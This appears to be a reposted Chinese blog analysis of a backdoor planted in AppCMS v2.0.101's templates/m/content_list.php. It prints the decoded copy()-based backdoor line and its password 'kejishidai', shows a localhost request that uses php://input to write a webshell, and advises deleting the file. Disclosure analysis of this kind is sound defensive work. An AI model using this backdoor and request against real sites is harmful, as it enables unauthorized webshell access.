AppCMS v2.0.101 后门分析

2019-04-04 约 407 字 预计阅读 1 分钟

声明:本文 【AppCMS v2.0.101 后门分析】 由作者 chybeta 于 2017-12-18 09:16:00 首发 先知社区 曾经 浏览数 3500 次

感谢 chybeta 的辛苦付出!

源码

下载地址:http://www.appcms.cc/html/gengxin.html

官方的更新时间是 2015-8-1

分析

用beyond compare比较与前一个版本的区别

可以发现,在 templates/m/ 文件夹下出现了一个 content_list.php 文件,修改时间为 2017年5月25日。

经过解密,9c224bc6b59179729b15e1dddcbb5c82为字符串kejishidai的md5值。

由代码知,这里存在一个copy函数构成的后门。

在第12行,实际执行的即为:

copy(trim($_GET[url]),$_GET[cms]);

将参数url设置为php://input,参数cms设置为shell的文件名,然后POST传入webshell。如下:

http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/content_list.php?session=kejishidai&url=php://input&cms=temp.php

POST:
<?php phpinfo();?>

接着访问:

http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/temp.php

getshell。

建议

删除 templates/m/ 文件夹下的content_list.php。

关键词:[‘安全技术’, ‘技术讨论’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now